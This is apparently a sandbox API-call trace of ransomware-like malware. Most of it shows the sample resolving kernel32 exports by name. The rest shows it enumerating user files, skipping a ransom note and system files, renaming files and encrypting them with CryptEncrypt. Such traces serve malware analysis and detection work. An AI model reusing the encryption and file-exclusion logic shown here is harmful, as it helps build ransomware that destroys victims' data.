lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.467] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.467] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.467] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.467] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.467] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.467] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.468] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.468] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.468] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.468] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.468] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.468] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.468] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.468] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.468] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.468] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.468] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.468] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.468] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.468] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.468] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.469] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.469] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.469] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.469] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.469] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.469] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.469] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.469] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.469] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.469] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.469] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.469] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.469] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.469] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.469] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.469] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.469] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.470] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.470] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.470] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.470] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.470] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.470] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.470] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.470] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.470] lstrlenA (lpString="DELETEATOM") returned 10 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.470] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.470] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.470] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.470] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.470] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.470] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.470] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.470] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.471] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.471] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.471] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.471] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.471] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.471] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.471] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.471] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.471] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.471] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.471] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.471] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.471] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.471] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.471] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.471] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.471] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.471] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.472] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.472] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.472] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.472] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.472] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.472] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.472] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.472] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.472] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.472] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.472] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.472] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.472] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.472] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.472] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.473] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 102 [0081.473] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej") returned 107 [0081.473] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.0eej"), dwFlags=0x0) returned 1 [0081.473] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.473] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.474] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.474] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb50b6e70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5175550, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb5175550, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xef3, dwReserved0=0x0, dwReserved1=0x0, cFileName="mimeTypes.rdf", cAlternateFileName="MIMETY~1.RDF")) returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="DECRYPT-FILES.txt") returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="autorun.inf") returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="boot.ini") returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="desktop.ini") returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntuser.dat") returned -1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="iconcache.db") returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="bootsect.bak") returned 1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntuser.dat.log") returned -1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="thumbs.db") returned -1 [0081.474] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Bootfont.bin") returned 1 [0081.474] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0081.474] lstrcmpiW (lpString1="rdf", lpString2="lnk") returned 1 [0081.474] lstrcmpiW (lpString1="rdf", lpString2="exe") returned 1 [0081.474] lstrcmpiW (lpString1="rdf", lpString2="sys") returned -1 [0081.474] lstrcmpiW (lpString1="rdf", lpString2="dll") returned 1 [0081.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.474] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0081.474] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" [0081.475] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.476] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=3827) returned 1 [0081.476] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.476] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.524] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.524] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.524] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.524] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.525] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.525] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.525] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.525] CloseHandle (hObject=0x464) returned 1 [0081.525] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.525] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.526] CloseHandle (hObject=0x0) returned 0 [0081.526] CloseHandle (hObject=0x460) returned 1 [0081.526] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.527] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.527] GetTickCount () returned 0x114cdcb [0081.527] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.527] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.527] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.527] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.528] lstrlenA (lpString="kernel32.dll") returned 12 [0081.528] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: 